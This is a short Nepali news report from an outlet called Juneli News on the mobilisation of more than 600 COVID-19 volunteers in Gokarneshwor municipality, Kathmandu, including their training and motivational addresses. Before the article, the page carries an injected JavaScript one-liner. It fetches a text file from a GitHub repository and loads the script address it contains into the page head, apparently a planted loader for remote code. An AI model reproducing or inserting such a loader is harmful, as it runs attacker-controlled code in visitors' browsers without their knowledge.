;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज,
काठमाडौँ | गोकर्नेश्वोर नगरपालिकामा कोरोना भाइरसको सुरक्षाको लागि समाजसेवी दिपक लामाको नेतृत्वमा ६०० जना भन्दा बढी स्वमसेवकहरुलाई परिचालन गरिएको छ | मिति २०७७ जेठ १५ गते जोरपाटीको क्लब मोसेसको कार्यक्रममा नगरपालिकाका प्रमुख सल्लाहकार दिपक रिसलले स्वमसेवकहरुलाई सम्बोधन गर्नु भएको थियो |
फिल्डमा गएर कसरि आफु सुरक्षित रही अरुको सेवा गर्ने लगायतका बिषयमा स्वमसेवकहरुलाई डाक्टर सुबास प्याकुरेल आएर प्रशिक्षण दिएका थिए |
स्वमसेवक परिचालनका प्रमुख सल्लाहाकार सम्भु प्रसाद अधिकारिले समेत स्वमसेवकहरुलाई उत्प्रेरणा गर्नु भएको छ |
फेसबुक प्रतिक्रियाहरु